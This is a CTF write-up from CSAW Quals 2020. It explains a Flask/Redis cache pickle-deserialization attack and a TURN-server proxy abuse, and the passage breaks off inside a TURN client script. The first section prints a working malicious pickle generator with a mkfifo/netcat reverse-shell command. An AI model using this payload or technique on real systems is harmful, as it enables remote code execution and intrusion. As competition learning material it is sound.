fact, most implementations can now support non-standard speeds like 115201, etc. Once you have a serial port adapter connected to your computer and a terminal emulator program up and running, it is time to put them to use and communicate with your MCU on the Starter Kit. USART Peripheral There is a very powerful Swiss army knife of a peripheral on the EFM32 MCU called a Universal Synchronous Asynchronous Receiver Transmitter (USART). Aren’t you glad that I explained what those big words meant beforehand? What that basically means is that the USART can universally handle just about any kind of serial transfer, whether that be synchronous or asynchronous, and it can receive as well as transmit. The MCU USART hardware, as well the software libraries that are built on top of that hardware, are at your disposal to automate a lot of the data transmission process, allowing your software to do other things and make the programming easier. You don’t need a USART to make this happen at slower speeds of 9600 baud or so. The serial interface is still around because it one of the simplest of communication protocols and can be designed completely in software in today’s modern embedded systems. However, your resources are always limited, and it still takes some CPU time and energy to toggle GPIO pins to emulate a serial link in software. It is better to use a USART if you have it and allows for much higher speeds like 115200 baud. We will configure USART instance 0 through the use of the Configurator tool in Simplicity Studio in the next section. PREVIOUS | NEXT Controlling the LED Strip with a Button Input So far, our simple little embedded program is completely hard coded to do one thing over and over again, forever. Let’s change that and start or pause the blinking with a pushbutton switch. There are two pushbuttons on the Starter Kit, and like the onboard LEDs, the pushbuttons circuits are detailed in the Starter Kit Schematics: Both pushbuttons are pulled up to VMCU (the supply voltage for the MCU) with 1M-ohm resistors. These are considered to be weak pullup resistors but they are enough to keep the MCU-side of the switches held high to VMCU until a user pushes a button. At that time, the 100-ohm resistor that is tying the circuit to ground sets up a resistor divider that is 100,000 times closer to ground than it is VMCU, and the pushbutton circuit is pulled low. The normally high circuit is momentarily pulled low, and we can detect that change in our firmware. You might think that UIF_PB0 and UIF_PB1 map back to port B, pin 0 and 1. But they actually map to port B, pins 9 and 10. PB0 stands for pushbutton 0 and PB1 stands for pushbutton 1. Let this be your first lesson in to never assume anything in embedded systems development! There is usually no feedback when you read from the wrong pin and no real way to figure it out except to double check all your connections. Let’s enable one of these pins as an input and read values from it in our loop. We can use that input to cause the LED strip to blink only when the pushbutton is pushed. First, create a function to hold a single on/off cycle of LED blinking: void blink_one_cycle(void) { // Turn on the LED GPIO_PinModeSet(LED_PORT, LED_PIN, gpioModePushPull, 1); // Add some delay for(volatile long i=0; i<100000; i++) ; // Turn off the LED GPIO_PinModeSet(LED_PORT, LED_PIN, gpioModePushPull, 0); // Add some more delay for(volatile long i=0; i<100000; i++); ; } Then, create #defines for PB9 as an input button and call that function from within the new code: #define BUTTON_PORT gpioPortB #define BUTTON_PIN 9 int main(void) { /* Chip errata */ CHIP_Init(); CMU_ClockEnable(cmuClock_GPIO, true); GPIO_PinModeSet(BUTTON_PORT, BUTTON_PIN, gpioModeInput, 0); while (1) { // Grab the state of the button, 1 for high voltage, 0 for low bool live_button_state = GPIO_PinInGet(BUTTON_PORT, BUTTON_PIN); // If the button is currently pushed, blink a single cycle if (live_button_state == 0) { blink_one_cycle(); } } } If you have everything wired correctly, pressing the button will blink the LED strip and releasing it will stop the blinking. Now, let’s make the LED strip toggle, where one button press turns it on and a second press turns it off. In order to do that, we have to keep track of the button state, as follows: int main(void) { /* Chip errata */ CHIP_Init(); CMU_ClockEnable(cmuClock_GPIO, true); GPIO_PinModeSet(BUTTON_PORT, BUTTON_PIN, gpioModeInput, 0); // The initial state of the button is high when not pushed bool past_button_state = 1; // Start out not blinking bool blinking = false;(); } } } So there you have it, you are now controlling the MCU from an input pin with a user interface. But the MCU is just looping for infinity looking for a button press. That wastes power, and since we probably want to embed this MCU into a battery-operated device, we can put it to sleep while we wait. Put the MCU to Sleep While it Waits We can nearly turn the MCU off with a state called EM4, the lowest possible energy state in the MCU. Upon exit of the state, it has nearly the same effect on the MCU as if we had pressed reset, so we cannot expect any of our variables to be preserved when entering and exiting EM4 state. That’s OK for this example. But you should treat EM4 as a “soft off” state. Unfortunately, the pins that are used for the pushbuttons on the Starter Kit are not capable of waking the part up from EM4, so if we put it into EM4, the only way we can ever wake it back up again is by removing power or pushing the reset button. That’s not what we want. Fortunately, we can use a jumper wire to connect the pushbutton circuit to an input pin that has the capability to wake the system up from EM4. The best place to find this information is in the Reference Manual, in the GPIO section, toward the end of the register section, you will find a few configuration registers that control EM4 Wake Up as part of the EMU peripheral. Configuration registers are used to control how the MCU peripherals operate and should not be confused with the ARM core registers. The registers inside the core are used for executing assembly code. Configuration registers are built in hardware and mapped by the memory controller into the normal memory address space, so that they are easily accessible by your firmware program. The header files for the MCU library created #define’s for all peripheral configuration registers, so you will see that I use those in the code below. You can always hover your mouse over the name of a register, and the IDE will show you the actual memory location, if you are curious. Inside the GPIO configuration register space, the register called GPIO_EM4WUEN is the enable, which is also used to select the pin (or pins, if we want) to be used to wake the system up. The GPIO_EM4WUPOL register holds the polarity of the wakeup pin, so we can configure it to wake up on a high or low voltage. Note that we will also need to turn off nearly all GPIO’s in use manually since we are going to need to leave the GPIO module powered in order to look for a wake up signal on one of the GPIOs. If we leave GPIO pins in an output mode, they will continue to drive those pins, consuming power. That might be a good thing for your design, if you need to continue to drive a GPIO in a deep-sleep mode, but it could just waste power. I’ll pick pin PC9 for the EM4 wake up pin, since that is the only one I could find that is brought out on the Starter Kit and it is on the J100 jumper. I will make a physical connection between the switch input pin PB9 and PC9, and then enable PC9 in the GPIO_EM4WUEN register. So now the pushbutton not only enters the MCU on PB9, it also enters the MCU on PC9. We could switch all of our code over to PC9 if we want or use them both. They are electrically connected copies. Since the system is essentially waking up in a reset state when it comes out of EM4, we need to give the system an initial state that the user will think is just a continuation of the operation. The user never knows that the system went to sleep and entered the EM4 state. You will need to add the em_emu.c file to your emlib directory from the em_src directory, just like we did last lesson for em_gpio.c and em_cmu.c. Then, add the header file to the top of your source code i.e. #include "em_emu.h". Then, create a new function called enter_em4() and call it from within the code that stops blinking. Then, in order to set things up so that exiting em4 causes things to blink, I set the blinking variable to 1. Then it will remain blinking until the button is pushed again. #define EM4_PORT gpioPortC #define EM4_PIN 9 #define EM4_WAKEUP_ENABLE 0x04 // Must change when changing w/u pin void enter_em4(void) { // Set PC9 as an input, used to wake the system GPIO_PinModeSet(EM4_PORT, EM4_PIN, gpioModeInputPull, 1); EMU_EM4Init_TypeDef em4_init = EMU_EM4INIT_DEFAULT; EMU_EM4Init(&em4_init); // Retain GPIO modes while in EM4, to wake it up with button press GPIO->CTRL = 1; GPIO->EM4WUEN = EM4_WAKEUP_ENABLE; GPIO->EM4WUPOL = 0; // Low signal is button pushed state // Wait for the button to be released before we go to sleep // or else we will immediately wake back up again while (!GPIO_PinInGet(EM4_PORT, EM4_PIN)) ; // Add some delay to let the switch settle for(volatile long i=0; i<100000; i++); GPIO->CMD = 1; // EM4WUCLR = 1, to clear all previous events EMU_EnterEM4(); } Once inside of the enter_em4() function, we set up the chip to wake up to the PC9 GPIO pin on low polarity. I added while loop to wait until the button is released, otherwise the MCU would immediately go to sleep, find the PC9 GPIO low, and exit from EM4 state. Finally, in the main code I switched the initial state of the blinking variable and added an else condition: int main(void) { /* Chip errata */ CHIP_Init(); CMU_ClockEnable(cmuClock_GPIO, true); GPIO_PinModeSet(BUTTON_PORT, BUTTON_PIN, gpioModeInputPull, 1); // Wait for the button to be released before we start blinking // or else we will immediately go back to sleep while (!GPIO_PinInGet(BUTTON_PORT, BUTTON_PIN)) ; // Add some delay to let the switch settle for(volatile long i=0; i<100000; i++); // The initial state of the button is high when not pushed bool past_button_state = 1; // Start out blinking at first bool blinking = true;(); } else { enter_em4(); } } } If you run this code, you will see that the LED strip is flashing upon the initial start up. When you press the pushbutton, the IDE will tell you that it lost contact with the Starter Kit and your LED will stop flashing. That is because it has gone into deep sleep and it shut down the debug port. When you press the pushbutton again, the LED strip starts blinking immediately, but it will not automatically connect to the debugger. TIP: If you want to examine the state of a running system, you can do that by picking Run -> Attach To in the IDE menu. This will connect to a running system without loading the flash nor issuing a reset to the MCU. This only works if the system is powered on and blinking, and not in EM4 state. Now your MCU is only consuming microwatts of power when the LED strip is off. It’s a first step toward running your projects on a coin cell battery, solar power, or even on an energy harvesting solution. If you are wondering if the MCU could drop into a deep sleep state while the LED is lit, to be awakened by a timer when it is time to turn off the LED strip while in the blinking mode, you are already thinking ahead to the next chapter. I will cover one more foundational topic to cover on clocks, timers and interrupts on tap for the next chapter before we start working on other peripherals. PREVIOUS | NEXT Nov 08 2017, 9:01 PM Welcome:
https://www.silabs.com/community/profile.html/home/users/community/s/OpwaSj177i0l7v82FWQq/profile
CC-MAIN-2020-29
refinedweb
12,311
58.01
Create a blog in minutes on App Engine with Django and Cloud Sql Written by: masci Last updated: 10 Feb 2014 Intro using Google Cloud Sql. Case study We’re going to setup a minimal project using Zinnia, a blog engine built on top of Django and a fairly complex web application that leverages several components of the framework, a good benchmark for showing how easy can be deploying on App Engine. Prerequisites Setting up the Google Cloud services goes beyond the scope of this article and is well documented, as well as having a working Python environment, so the following it’s assumed: - you already started a Google Cloud project - a Google Cloud Sql instance is up and running and you created a database for this project - you created a bucket on Google Cloud Storage to store media files - you have a working installation of Python 2.7 and pip on your local machine - you installed and configured the Python App Engine SDK on your local machine For the last point, make sure that issuing import google from a Python prompt does not raise any error. Even if not required, I strongly recommend to use virtualenv to isolate the Python environment for this project. Bootstrap Let’s start installing Django. The latest version available in the App Engine Python 2.7 environment is the 1.5, so we go for the same: pip install django<1.6 Once finished, we can start an empty project: django-admin.py startproject myblog This will create the typical Django application layout: myblog |_ myblog |_ manage.py The project needs some dependencies that can be listed in a plain text file, one package per line, so that pip can install them all at once. Along with the package name we can specify the version number, so that requirements won’t change across different installations. Let’s put the following in a file called requirements.txt and save it at the root of the project: django-blog-zinnia==0.13 django-appengine-toolkit pillow Then we install the dependencies with: pip install -r requirements.txt After pip finished we can finally start coding. Configure Django and Zinnia First of all, we need to tell Django which application we want to use in our project, so open myblog/myblog/settings.py file and add these lines to INSTALLED_APP setting: INSTALLED_APPS = ( # other stuff here, 'django.contrib.admin', 'django.contrib.comments', 'tagging', 'mptt', 'zinnia', 'appengine_toolkit', ) the last application, appengine_toolkit, is an helper that will make easier accessing some features of App Engine from a Django project, we will see how in a moment. We want to put all the static files (javascripts, css, images) in a folder called static at the root of our project (to be clear, along with the manage.py module). Django can automatically collect such files if we set the variable STATIC_ROOT in settings.py with the full path to the desired folder. We want to build an absolute path that will work both in local and production environments, so it can be convenient to add a variable BASE_DIR to the settings.py pointing to the project root in a portable manner: BASE_DIR = os.path.dirname(os.path.dirname(__file__)) We can then refer the absolute path to the static folder as follows: STATIC_ROOT = os.path.join(BASE_DIR, 'static') Zinnia uses a template context we need to set along with Django’s default contexts so we add this block of code in settings.py module: TEMPLATE_CONTEXT_PROCESSORS = ( 'django.contrib.auth.context_processors.auth', 'django.core.context_processors.i18n', 'django.core.context_processors.request', 'django.core.context_processors.media', 'zinnia.context_processors.version', ) Following lines must be added to our project’s urls.py in order to display the blog: from django.contrib import admin admin.autodiscover() urlpatterns = patterns('', url(r'^admin/', include(admin.site.urls)), url(r'^weblog/', include('zinnia.urls')), url(r'^comments/', include('django.contrib.comments.urls')), ) Configure App Engine Now we need to create the yaml file containing App Engine application settings. At the root of the project create an app.yaml text file containing the following: application: your_project_id_here version: 1 runtime: python27 api_version: 1 threadsafe: true libraries: - name: django version: "1.5" - name: PIL version: "1.1.7" - name: MySQLdb version: "latest" builtins: - django_wsgi: on env_variables: DJANGO_SETTINGS_MODULE: 'myblog.settings' DATABASE_URL: 'mysql://root@your-project-id:sql-instance-name/database-name' handlers: - url: /static static_dir: static Some parameters need to be adjusted with actual data, in particular we have to provide our Google Cloud project ID and the Cloud SQL instance name. Configure database The DATABASE_URL environment variable contains all the parameters needed to perform a connection from an App Engine application to our database. Just add the following code to the settings.py to make Django capable to parse and make use of such parameters: import appengine_toolkit DATABASES = { 'default': appengine_toolkit.config(), } APPENGINE_TOOLKIT = { 'APP_YAML': os.path.join(BASE_DIR, 'app.yaml'), } That’s all and from now on, all we have to do for changing database connection parameters is to modify the DATABASE_URL environment variable and deploy the application again. File storaging We will store uploaded files in a bucket on Google Cloud Storage and we will let Django handle the upload process and then ask the Blobstore API for a link to statically serve the same files. All we need to do is telling Django the bucket name and the Python class to use to talk to Cloud Storage API: APPENGINE_TOOLKIT = { # other settings here 'BUCKET_NAME': 'zinnia-uploads', } DEFAULT_FILE_STORAGE = 'appengine_toolkit.storage.GoogleCloudStorage' STATICFILE_STORAGE = 'appengine_toolkit.storage.GoogleCloudStorage' Deploy Configuration steps are over, time to create the database schema with Django’s built in management commands. Before proceeding, we have to set the DATABASE_URL environment variable on the local machine performing the command. This is because we need to connect to the Cloud SQL instance from the local machine and the connection string is slightly different from the one you would use in production, notice the rdbms:// component: export DATABASE_URL='rdbms://root@your-project-id:sql-instance-name/database-name' With the variable set, issue the following command: python manage.py syncdb During the schema creation we will prompted for username and password to assign to the admin user. Now we need to provide application dependencies and App Engine has a peculiar approach to this: it requires that every piece of software which is not already provided by the Python Environment has to be uploaded together with application code during the deployment process. Instead of mangling our local Python environment we will use a functionality provided by django_appengine_toolkit package. It adds a management command to Django that symlinks all the dependencies needed in a folder inside the project root, making that folder available to the Python environment. We issue the command: python manage.py collectdeps -r requirements.txt and if everything is fine we will have a libs directory inside the project root containing all the dependencies needed. Now we need to collect all the static files in one place, that’s the static directory at the project root. Just issue the command: python manage.py collectstatic and we should find a folder named static at the project root that contains all the files needed by our application. Now the final step, the actual deployment. If we are on a Mac we can use the Google App Engine Launcher tool and complete the deployment through a graphical interface. Otherwise on Linux just issue this command in our project root: appcfg.py --oauth2 update . Check out for any error and try accessing your application with a browser, you should see the Zinnia home page. You can find the code of the example application in my repo on GitHub. Conclusions These days App Engine seems to be a land the Django community forgot, but I think times are good for a change: the brand new Cloud Console and the gcloud Tool, new services like Cloud Sql and the efforts in supporting the Python SDK can make the life of a Djangonaut a lot easier on the Google platform. Sure, documentation should improve as well as the support to some client libraries but I think it’s worth it and with a little code we can get very close to something like “one click deploy”.
http://dev.pippi.im/2014/02/10/create-a-blog-in-minutes-on-app-engine-with-django/
CC-MAIN-2014-15
refinedweb
1,374
53
I can't understand why this easy plugin don't work (don't create file). class ExampleCommand(sublime_plugin.TextCommand): def run(self, edit): f = open("my.sublime-snippet", "w") f.write("Hello world") f.close() But after any changes it works correctly.Can anyone help me to understand this? Are you sure it didn't just create the file somewhere you weren't expecting? Oh, sorry, I found it in \System32, but why? I thinks that it must appeare in folder with plugin. I tried to change this plugin and resave it and after that it works. But after restarting sublime text it doesn't work again.P.S. And sorry for my bad english. Probably has to do with how/where the plugin is being executed from. Why not give the full path so you know exactly where it is being created. For example, you can use sublime.packages_path() to get the packages directory. You can then append the package name and the snippet, which are things you are defining. Ok. Thank you for help.
https://forum.sublimetext.com/t/create-files-from-sublime-plugin/9620/2
CC-MAIN-2016-36
refinedweb
176
71.1
These are chat archives for ipython/ipython I was wondering if I can make an output interactively run a piece of code. So if for example I had a class (parts in pseudo-code): import numpy as np class test(object): def __init__(): self.a = np.random.randn(10) print ## Interactive Output: Click me to view data array## def show(): print a So when I create a class instance it should output some interactive link (maybe in html) or something like that and when I click it, the show() method should be called. However, I have no idea how to achieve that.
https://gitter.im/ipython/ipython/archives/2015/08/23
CC-MAIN-2019-26
refinedweb
102
72.7
Any how my wife has been wanting to move in a greener direction and has been rather matter a fact about it as well. We now compost our organic waste and recycle that in to our garden. Her new kick was "How can we heat the spa without using the electronic heater?" She got up on the roof with 50ft of black hose and ran it back and forth a few times, hooked it to a pump and came up with the proof of concept. Yay! [The original idea was sourced from my coworker Gary which. Step 1: Parts list 20ft of 1/2in diameter PVC pipe 1 x 1/2in 4-way Cross PVC Fitting PVC cement for gluing PVC sections to 4 way fitting 500ft 1/2in diameter black drip irrigation hose 2 x drip irrigation to standard garden hose coupling Around 200 outdoor 8in zip ties 2 x 25ft or so normal garden hoses to use as water feed and return (Not included in $60 est as we had 2 on hand) 1 water pump to push water up to the roof and through the solar coil for heating. (Also not included in $60 est as we had one on hand) Nice reading your project. I have question regarding on this solar water heater. I live in Indonesia and have a project to build swimming pool with area 10X8 meter and the deep is 1,5 meter. The volume is 120 meter cubic. The water temperture average in Indonesia is 25 C. I want to increase the temperature around 33 C. My question is how long the tube ? do you have any suggestion to run this project ? Thank you what size pump do you have? why or how does the air get in the lines? What if I took that dish, painted it black then wound your hose round and round in that? Our pool area gets full sun most of the day (in high summer it's more like a hot tub!) so I wouldn't have to mount it far from the pool pump at all. What do y'all think of that? anxious... One suggestion would be to wrap the PEX in a pipe insulation of some kind to protect it from UV. PEX is great in areas where freezing temperatures are an issue and is extremely flexible. you missed the mention of OUTDOOR zip ties in the parts listing - as they are less UV sensitive, they make a LOT of difference in the life expectancy of the fasteners. Cheers Note: Still working on the SpaDuino project and instructable to match... Any amount you heat the water without electricity is money saved. It would be a good Idea to bypass this system at night or on cloudy days because it will radiate heat into the air/space when the sun isn't shining. Perhaps you could hook up a power measuring device (e.g., Kill-A-Watt) to your pump to indicate the energy use? Maybe compare with the energy consumption of the spa without solar warming? Also, maybe put some reflective insulation panels underneath the coil on the roof to further heat them as well as isolate the heat from the roof? I made something very similar for my wood fired hot tub. I was using it on the ground so that the warm water could passively thermosiphon into the tub. I found that I needed to insulate it from the ground as it would loose too much heat from conduction. In terms of pay off however the gains were pretty small. What I got from a days worth of solar heating could be achieved with an armload of wood in an hour. 11:11am - (85.8 - 93.9)? 01:03pm - (91.0 - 101.1)? 01:57pm - (93.9 - 104.3)? * Peak reading 03:37pm - (96.8 - 106.8)? 04:18pm - (98.6 - 103.8")? Scales in celsius? Total increase over the time we monitored: 16.4 degrees fahrenheit Cheers I built a pool heater using basically the same idea a long time ago - I put 5 expanded 100' coils of 1/2" PVC (500 feet of it in total) into five 2'x8' wooden boxes connected in series, with glass 1 side mounted on backyard shed roof. The pool pump (3/4 hp 300 GPM) drove water through a controllable 'Y" connection (restrictor) - flow required regulation so that water would heat up sufficiently else it acted as radiator - the exact opposite of what was desired. This could have been a function of ambient temperature at my location (43 degrees N) It worked reasonably well however its demise as Duplo above mentioned was UV from the sun - even with the piping behind glass it started to break down (became brittle and developed pinhole leaks) after 5 or 6 years and requiring many patches, too many :-), and I scrapped it. I'd strongly suggest using UV stabilzed PVC pipe - much more expensive though How hot did the water get & other stats? it would be easier just use the UV stabilzed PVC if you are going build one - either that or make the PVC pipe easily replaceable - my design did not allow for this - live and learn - Petastream's design would be better suited to periodic replacement IMO as to heat added - I'd guess delta between inflow and outflow was about 7 degrees C - not huge but noticeable considering my pool is heated only by the sun. the roof temperature (under the shingles) hit ~80 C on a nice sunny day Also, how strong in the pump you used? (GPM)
http://www.instructables.com/id/Overview-2/CNVGSYIH1JUGXZG
CC-MAIN-2015-27
refinedweb
936
76.05
/* * _FTPMUNGE_H_ #define _FTPMUNGE_H_ #include <new> /* The ftpaccess file used by xftpd does not support spaces and tabs as in filenames because it uses them as delimitors. To get around this problem xftpd allows users to convert string with spaces and tabs into ftp strings. The conversions are done the same way URL encoding is done, except that the caret chararcter (^) is used instead of the % character, but only for spaces, tabs, and carets raw string ftp string ---------- ---------- '\t' ^09 '\n' ^0A ' ' ^20 ^ ^5E */ /* Return a new new'd string that is the encoding of RAW. Returns NULL on failure. The caller is responsible for deallocating the string. */ char *raw2ftpstr( const char *raw ) throw( std::bad_alloc ); /* Return a new new'd string that is the unencoding of FTP. Returns NULL on failure. The caller is responsible for deallocating the string. */ char *ftp2rawstr( const char *ftp ) throw( std::bad_alloc ); #endif // _FTPMUNGE_H_
http://opensource.apple.com/source/DSPasswordServerPlugin/DSPasswordServerPlugin-207.2/ftpmunge.h
CC-MAIN-2015-27
refinedweb
149
63.59
Introduction: Some functions are called higher-ordered functions as they accept functions as parameters. You can also have a higher-order function as one that returns the functions. So basically, if there is a function that deals with a function, is kind of a meta-level, we call it higher order. Why do we use higher order functions..?? Because we want to be able to reuse our code over and over again on different parameters (functions that the code calls) and to simplify the structure/organization/readability of our program by abstracting the implementation of a potentially complicated algorithm away from its use. So the function that we are doing here is a way of generalizing the combining of three numbers. So let’s consider some little examples. def sum(x:Double, y:Double, z:Double):Double => x+y+z Another way to combine three numbers would be multiplication. And so defining something which is very similar to addition, that is multiply. def multiply(x:Double, y:Double, z:Double):Double => x*y*z Another way to combine three numbers would be to find the minimum among the three. We can write it using min as the operator. def min(x:Double, y:Double, z:Double):Double => x min y min z And we can see the results below. sum(1,2,4) Double = 7.0 multiply(3,2,4) Double = 24.0 min(1,3,6) Double = 1.0 Now, I would like to do all these functions and possibly others and combine them into one single function and call it as combine. In addition to these value arguments, I also need the function I am going to use to combine them. Let’s call it f. Just like others, we have to specify the type here as well and this function takes two doubles and gives us back a double. scala> def combine(x:Double,y:Double,z:Double,f:(Double,Double)=>Double):Double = f(f(x,y),z) def combine(x: Double, y: Double, z: Double, f: (Double, Double) => Double): Double Let’s see the output. scala> combine(1,2,3,(x,y)=>x+y) val res0: Double = 6.0 And it is working fine. It can also be written in the format as shown below because these two are equivalent. scala> combine(1,2,3,_+_) val res1: Double = 6.0 scala> combine(2,4,6,_*_) val res4: Double = 48.0 This is a simple example of a higher-order function. And it is a higher-order function because it takes one of its arguments which has a function type and this function type is specified as shown above. This gives a brief introduction to higher-order functions and shows us how we can use these things. The commonly used higher-order functions in Scala are map, flatMap, filter, etc. The simple examples are as below. map: scala> val subject = Vector("MATHS","ENGLISH","SCIENCE") val subject: scala.collection.immutable.Vector[String] = Vector(MATHS, ENGLISH, SCIENCE) scala> subject.map(sub => sub.toLowerCase) val res1: scala.collection.immutable.Vector[String] = Vector(maths, english, science) flatMap: scala> Seq("Hi","This is about","higher order functions").flatMap(s => s.split(" ")) val res1: Seq[String] = List(Hi, This, is, about, higher, order, functions) filter: scala> val names = List("Hi","this","blog","explains","higher","order","funcitons") val names: List[String] = List(Hi, this, blog, explains, higher, order, funcitons) scala> val seqNames = names.filter(name => name.length > 2) val seqNames: List[String] = List(this, blog, explains, higher, order, funcitons) scala> val seqNames = names.filter(name => name.length > 4) val seqNames: List[String] = List(explains, higher, order, funcitons) Some important points about Higher order functions: - It is beneficial in producing function composition where, functions might be formed from another functions. The function composition is the method of composing where a function shows the utilization of two composed functions. - It is also constructive in creating lambda functions or anonymous functions. The anonymous functions are the functions which does not has name, though perform like a function. Conclusion: This topic will be used in plenty of useful places in your code. Higher-order is an important concept and easy to master as well. So, I would say, keep practicing. That’s all basic I have in my mind as of now, related to higher-order functions References:
https://blog.knoldus.com/higher-order-functions-in-scala-2/
CC-MAIN-2022-05
refinedweb
724
57.67
(Inverse) Real Discrete Fourier Transforms. More... #include <stdlib.h> #include <math.h> #include "libavutil/mathematics.h" #include "rdft.h" Go to the source code of this file. Map one real FFT into two parallel real even and odd FFTs. Then interleave the two real FFTs into one complex FFT. Unmangle the results. ref: Definition at line 57 of file rdft.c. Referenced by ff_rdft_init(). Set up a real FFT. Definition at line 99 of file rdft.c. Referenced by decode_init(), ff_dct_init(), qdm2_decode_init(), and wmavoice_decode_init(). Definition at line 132 of file rdft.c. Referenced by decode_end(), ff_dct_end(), qdm2_decode_close(), and wmavoice_decode_end(). Definition at line 47 of file rdft.c. Referenced by ff_rdft_init().
http://ffmpeg.org/doxygen/trunk/rdft_8c.html
CC-MAIN-2017-04
refinedweb
110
65.49
CSAW Quals 2020 was one of the CTFs I was looking forward to the most this year. Unfortunately, the CTF ended up being a total mess, with infrastructure issues, and broken challenges. However, this CTF was the first to introduce some new challenge categories: steg rev and steg web! Honestly, I don't know whose idea it was to make a CTF of only misc challenges, but I hope that this year was a fluke due to COVID. I played this CTF with a new team, Crusaders of Rust, a merger between PentaHex and Albytross. We ended up qualifying for the finals, as we placed 9th in the undergraduate US-Canada division, which was well in the 15 spots allocated! We placed 24th overall, but we were very close to solving Blox 2 (network and platform issues). Now, onto the writeups! As the resident web guy on our team, I was pretty happy to FC all of the web challenges. Flask Caching was a Python/Flask web challenge where you could upload small notes with custom names. However, you couldn't view them, so they were just uploaded. The source was provided: #!/usr/bin/env python3 from flask import Flask from flask import request, redirect from flask_caching import Cache from redis import Redis import jinja2 import os app = Flask(__name__) app.config['CACHE_REDIS_HOST'] = 'localhost' app.config['DEBUG'] = False cache = Cache(app, config={'CACHE_TYPE': 'redis'}) redis = Redis('localhost') jinja_env = jinja2.Environment(autoescape=['html', 'xml']) @app.route('/', methods=['GET', 'POST']) def notes_post(): if request.method == 'GET': return ''' <h4>Post a note</h4> <form method=POST enctype=multipart/form-data> <input name=title placeholder=title> <input type=file name=content placeholder=content> <input type=submit> </form> ''' title = request.form.get('title', default=None) content = request.files.get('content', default=None) if title is None or content is None: return 'Missing fields', 400 content = content.stream.read() if len(title) > 100 or len(content) > 256: return 'Too long', 400 redis.setex(name=title, value=content, time=3) # Note will only live for max 30 seconds return 'Thanks!' # This caching stuff is cool! Lets make a bunch of cached functions. @cache.cached(timeout=3) def _test0(): return 'test' @app.route('/test0') def test0(): _test0() return 'test' # all the way to test30() The source shows that the notes are stored in the Redis database, and there are 31 other urls, from /test0 to /test30 that are cached for 3 seconds. It looks like the urls are also cached in the Redis database. I found the source for the flask-caching library, and doing some more digging, I found exactly the Redis implementation for the caching. Looking at the source, I saw that if the object content starts with a "!", flask-caching will unpickle the content when loading it. Python's pickling library is a famous vector for insecure deserialization, so if we can get it to unpickle our custom payload, we can easily get RCE. import pickle import os class RCE: def __reduce__(self): cmd = ('rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | ' '/bin/sh -i 2>&1 | nc <ip> <port> /tmp/f') return os.system, (cmd,) if __name__ == '__main__': pickled = pickle.dumps(RCE()) open("rce.txt", "wb").write(b"!" + pickled) With the following script, we create a text file rce.txt that, when unpickled by the caching library, will launch a reverse shell. Now, we need to figure out the key name that the caching library uses. I installed the app on my server and used redis-commander to look at the Redis keys. After opening up a cached URL, I found a key named flask_cache_view//test25. Uploading rce.txt under that key name and going to /test25 within 3 seconds spawned a reverse shell! From there, all I had to do was cat the flag. flag{[email protected]_10rD} This challenge was worth 450 points, tied with another chall for the highest point-value in the whole CTF. The website was a peer-to-peer chat service where two people who connected to the same URL could chat and message with each other. However, I thought the challenge was broken for the longest time until I figure out it only worked for Firefox for me. The source was provided, but there was nothing that seemed out of the ordinary or seemed like a vulnerability that could be exploited. Looking at the technologies further, I found that WebRTC was used which connected to a TURN server that the organizers hosted. I'd never looked into WebRTC / TURN / STUN before, so after a lot of research, I realized that I had no idea how to solve the challenge, nor what TURN or STUN even were. However, after doing some more recon, I came across this article, called "How we abused Slack's TURN servers to gain access to internal services". The article described abusing a TURN server to interact with internal services not listening on external interfaces, almost like an SSRF but without the HTTP headers. The author reported this to Slack's bug bounty, and they fixed and patched the bug. After finding this article, the path was clear. Implement this vulnerability to try and talk with internal services, and somehow leverage those to gain RCE. At this point, it was at 11 PM. I thought it would be easy, just find the PoC on the bug report, fiddle with it a bit, then ez exploit! But, I realized that the author didnt provide a proof of concept????????????? So, I went to looking for TURN and STUN implementations and played around with them, but was unable to get anything working. There was only around 12 hours left to the end of the CTF, and we needed a couple more hundred points to be at a safe spot. At this point, me and my other web partner, Drakon, sat down and worked on this script for the next 6 hours. The idea behind the exploit is that when connecting to the TURN server, you send a special packet, XOR-PEER-ADDRESS, which (on an insecure system), proxies the connection to the internal service. However, to get this to work, we needed to build a working TURN client. Here was our implementation of the vulnerability, made by scouring the RFCs and documentation for hours, and constant trial and error. import socket import secrets TURN_IP = '216.165.2.41' TURN_PORT = 3478 BUFFER_SIZE = 1024 def constructHeader(message, length, transactionID): # i want to die messageTypeList = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0] # who the fuck designed this specification if message[0] == "allocation": messageTypeList[14] = 1 messageTypeList[15] = 1 elif message[0] == "connect": messageTypeList[12] = 1 messageTypeList[14] = 1 elif message[0] == "connectionbind": messageTypeList[12] = 1 messageTypeList[14] = 1 messageTypeList[15] = 1 if message[1] == "request": # control bits are in the middle of fucking nowhere pass messageType = ''.join([ str(i) for i in messageTypeList]) # 14 bits because why not (two 00 in beginning for padding) messageLength = bin(length)[2:].zfill(16) # 16 bits, size of the message in bytes (attributes are padded to multiple of 4 bytes, so the last 2 bits better be zeor you hoe) magicCookie = "2112A442" # what the fuck is the point of this packet = binToHex(messageType) + binToHex(messageLength) + magicCookie + hex(transactionID)[2:] # mish mash my damn functions return packet, transactionID def constructAttribute(attribute, value): if attribute == "REQUESTED-TRANSPORT": t = "0019" l = "0004" elif attribute == "XOR-PEER-ADDRESS": t = "0012" l = hex(len(value)//2)[2:].zfill(4) elif attribute == "CONNECTION-ID": t = "002a" l = "0004" v = value return t + l + v def xorIP(ip, port): xip = hex(ipToDec(ip) ^ 0x2112A442)[2:] xport = hex(port ^ 0x2112)[2:] return xip, xport def decodeHeader(header): messageType = bin(int(header[:4], 16))[2:].zfill(16) messageLength = header[4:8] magicCookie = header[8:16] if magicCookie != "2112a442": print("Your cookie is garbage.") # cookie was incorrect transactionID = header[16:] typeClass = messageType[7] + messageType[11] if typeClass == "00": typeClass = "request" elif typeClass == "01": typeClass = "indication" elif typeClass == "10": typeClass = "success response" elif typeClass == "11": typeClass = "error response" else: typeClass = "CRITICAL ERROR" # idk how this even happens method = hex(int(messageType[:7] + messageType[8:11] + messageType[11:], 2)) return (messageLength, int(transactionID, 16), typeClass, method) def decodeMessage(message): i = 0 returnArr = [] while i < len(message): t = message[i:i+4] l = int(message[i+4:i+8], 16) * 2 v = message[i+8:i+l+8] i += l + 8 if t == "0016": t = "XOR-RELAYED-ADDRESS" v = parseIP(v) elif t == "0020": t = "XOR-MAPPED-ADDRESS" v = parseIP(v) elif t == "0012": t = "XOR-PEER-ADDRESS" v = parseIP(v) elif t == "000d": t = "LIFETIME" v = int(v, 16) # in seconds elif t == "8022": t = "SOFTWARE" v = 